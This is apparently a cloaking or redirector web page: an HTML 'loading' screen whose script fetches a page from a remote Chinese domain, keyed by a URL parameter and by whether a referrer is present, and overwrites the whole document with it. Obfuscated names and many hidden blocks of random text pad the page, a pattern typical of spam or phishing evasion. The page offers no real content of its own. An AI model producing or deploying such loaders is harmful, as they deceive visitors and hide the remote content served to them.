<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .e0IW8cc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .e0IW8cc .Nf1Zz6q {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .e0IW8cc .content {
            line-height: 50px;
            text-align: center
        }

        .e0IW8cc .img {
            width: 100%
        }

        .e0IW8cc .TNF7hmSb1Ji {
            text-align: center
        }

        .e0IW8cc .TNF7hmSb1Ji span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .e0IW8cc .TNF7hmSb1Ji span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .e0IW8cc .TNF7hmSb1Ji span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .e0IW8cc .TNF7hmSb1Ji span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .e0IW8cc .TNF7hmSb1Ji span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .e0IW8cc .TNF7hmSb1Ji span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .e0IW8cc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function rlUWtLycP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NIhueq = rlUWtLycP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NIhueq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NIhueq +".html?a=share";
		}
		
        ZYeIUc6u=url+"#"+new Date().getTime();
        ZYeIUc6u && function() {
            $.get(ZYeIUc6u, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>KxG2oqwuNTSYEd90vAKCMm0H5qrNqjPjF7alszmjn7ZgJzVZdv41DOvINAZP2llGIXpAs5C</span>
<a  href='#' style='display:none'>DSY8A92hJUOOFFfgAuc0JPt</a>
<a  href='#' style='display:none'>DSY8A92hJUOOFFfgAuc0JPt</a>
<img  src='' style='display:none'>
<b style='display:none' >lQF2LYyFvTRfMRAkX99UHVvhRbhlyagCg2uwCV3emOufk3lVvozEzqfZnGI5ZqXiZNKb3o1R</b>
<li style='display:none' >a3sIqBZedxqGXfAWbGZN8Wgn1Xpkn3soHtNLjDOX1OsuIS7ptISD5</li>
<a  href='#' style='display:none'>DSY8A92hJUOOFFfgAuc0JPt</a>
<li style='display:none' >a3sIqBZedxqGXfAWbGZN8Wgn1Xpkn3soHtNLjDOX1OsuIS7ptISD5</li>
<img  src='' style='display:none'><div class="e0IW8cc">
    <div class="Nf1Zz6q">
        <div class="TNF7hmSb1Ji">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>K8gSGsOIFQugGrq8SM1dy6he5SBlBVnl2SLMBdDTh0MK8HlHCXCKFTMGRVapeFhf0aHjbrUb1uCaZlbIFadGE</span>
<div style='display:none'>RY6Nq2HSN9yiUEvaKbfNQKNhBg9tWKj7FVq9cBG24gAiLXELDOGD2Gcd46KHc</div>
<img  src='' style='display:none'>
<li style='display:none' >WwF9UB0FMvst2u3c6HGV8RkDzZrJOPOfoObMxKKICOTGahAqAQo95vWl7rhsrvatCa4YtufaN86PtdsjFywQF8iCgNc</li>
<h1 style='display:none' >YdhXyBi7K1hiTuFFzxOYf83DKej4pnAVGt0jeZ7E3kGMEZhe</h1>
<li style='display:none' >WwF9UB0FMvst2u3c6HGV8RkDzZrJOPOfoObMxKKICOTGahAqAQo95vWl7rhsrvatCa4YtufaN86PtdsjFywQF8iCgNc</li>
<ul style='display:none' >cFEoDdw4t7lgKBJzit0zT451YAYdCAoxnv4DX7YOndHyRDuv0dq4ZnoTE2n0W1E90DXTVPGJ9HNiHzEhCVkGW5N8ywOV</ul>
<span style='display:none'>K8gSGsOIFQugGrq8SM1dy6he5SBlBVnl2SLMBdDTh0MK8HlHCXCKFTMGRVapeFhf0aHjbrUb1uCaZlbIFadGE</span>
<p  style='display:none'>zmcGiLeYYinh0zdzArXBNVOQb5hfkHI3Zf0ZRwxoPG714IbfbQ4VcmZZZlMy2yyVJvtW8HLEKcntdEeOtev7SweVeicYMS8adHG8q</p>
<p  style='display:none'>zmcGiLeYYinh0zdzArXBNVOQb5hfkHI3Zf0ZRwxoPG714IbfbQ4VcmZZZlMy2yyVJvtW8HLEKcntdEeOtev7SweVeicYMS8adHG8q</p></body>
</html>